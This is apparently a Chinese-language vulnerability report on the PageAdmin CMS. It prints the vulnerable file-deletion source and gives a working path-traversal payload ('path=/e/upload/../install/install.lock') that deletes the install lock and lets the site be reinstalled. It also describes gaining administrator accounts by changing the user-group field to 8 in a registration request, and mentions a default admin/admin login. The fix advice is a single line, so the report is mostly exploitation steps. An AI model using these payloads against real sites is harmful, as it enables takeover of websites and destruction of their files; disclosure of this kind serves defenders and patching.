最新版任意文件删除

漏洞一 任意文件删除 可导致系统重装 不过需要管理员权限

看下这个文件
 

e/aspx/delete_file.aspx

 

<% @ Page language="c#"%>
<% @ Import NameSpace="System.Data"%>
<% @ Import NameSpace="System.Data.OleDb"%>
<% @ Import NameSpace="System.IO"%>
<% @ Import NameSpace="PageAdmin"%>
<script Language="C#" Runat="server">
override protected void OnInit(EventArgs e)
{
  Check_Post();
  string Table=Request.Form["table"];
  string Field=Request.Form["field"];
  string Id=Request.Form["id"];
  string D_File=Request.Form["path"];
  string UserName="";
  int IsMaster=0;
  int CanDel=1;
  if(IsStr(Table) && IsStr(Field) && IsNum(Id))
    {
     Conn theconn=new Conn();
     OleDbConnection conn=new OleDbConnection(theconn.Constr());
     conn.Open();
     if(Request.Cookies["Master"]!=null)
      {
        Master_Valicate Master=new Master_Valicate();
        Master.Master_Check();
        IsMaster=1;
      }
     else
      {
        Member_Valicate Member=new Member_Valicate();
        Member.Member_Check();
        UserName=Member._UserName;
      }
     string sql;
     OleDbCommand comm;
     OleDbDataReader dr;
     sql="select id from pa_field where thetable='"+Table+"' and [field]='"+Field+"'";
     comm=new OleDbCommand(sql,conn);
     dr=comm.ExecuteReader();
     if(!dr.Read()
       {
        CanDel=0;
       }
      dr.Close();

     if(CanDel==1) //数据库要有刚才那个记录 candel的值才不会被修改为0
      {
        if(IsMaster==1) //需要管理员权限
        {
         Del_File(D_File); //跟进
        }
       if(Id!="0")
       {
        if(IsMaster==0)
        {
         sql="update "+Table+" set "+Field+"='' where username='"+UserName+"'' and id="+Id;
        }
       else
        {
         sql="update "+Table+" set "+Field+"='' where id="+Id;
        }
        comm=new OleDbCommand(sql,conn);
        comm.ExecuteNonQuery();

        if(IsMaster==0)
        {
         sql="update pa_file set detail_id=0 where username='"+UserName+"'' and thetable='"+Table+"' and [field]='"+Field+"' and detail_id="+Id;
        }
       else
        {
         sql="update pa_file set detail_id=0 where thetable='"+Table+"' and [field]='"+Field+"' and detail_id="+Id;
        }
        comm=new OleDbCommand(sql,conn);
        comm.ExecuteNonQuery();
       }
      }
     conn.Close();
    }
}

private void Del_File(string FilePath)
 {
   if(FilePath!="" && FilePath.IndexOf(":")<0 && FilePath.IndexOf("/e/upload/")==0) //没过滤..可跳出目录 要以/e/upload/ 开头
    {
     if(FilePath.IndexOf("/zdy/")<0)
       {
         FilePath=Server.MapPath(FilePath);
         if(File.Exists(FilePath))
          {
            File.Delete(FilePath);
          }
      }
   }
 }

漏洞证明



可结合大牛的漏洞进行组合攻击

PageAdmin可绕过验证伪造任意用户身份登录（前台、后台）
 

http://wooyun.org/bugs/wooyun-2010-061861

现在进行测试就不用上面的步骤了，默认admin/admin 登陆后台，



然后访问
 

http://192.168.1.104/e/aspx/delete_file.aspx

post 提交
 

table=pa_member&Field=pa_address&id=0&path=/e/upload/../install/install.lock

本来是这样的 install.lock没删除
 

按上面操作之后
 

系统就可以重新安装了



或者可删除任意文件了



漏洞二 系统后台是默认 不允许注册管理员的
 

我们看下前台注册吧

访问

http://192.168.1.104/e/member/index.aspx?s=1&type=reg

我们提交注册信息抓下包看看
 

多了一个用户组 1代表普通会员 8代表管理员 把他修改成提交
 

 

 

然后看下后台
 

后台虽然设置了 禁止注册管理员账号 但是我们还是注册了管理员账号

如果开启了这样的模式
 

很多人认为 如果禁止了管理员注册了 那么第二个选项 是否审核注册用户觉得很多余了 干脆不审核注册管理员账号 或者可以设置邮箱验证（下拉有三个选项 不要选无需验证就好） 哈哈 那就危险了

修复方案：

对参数进行处理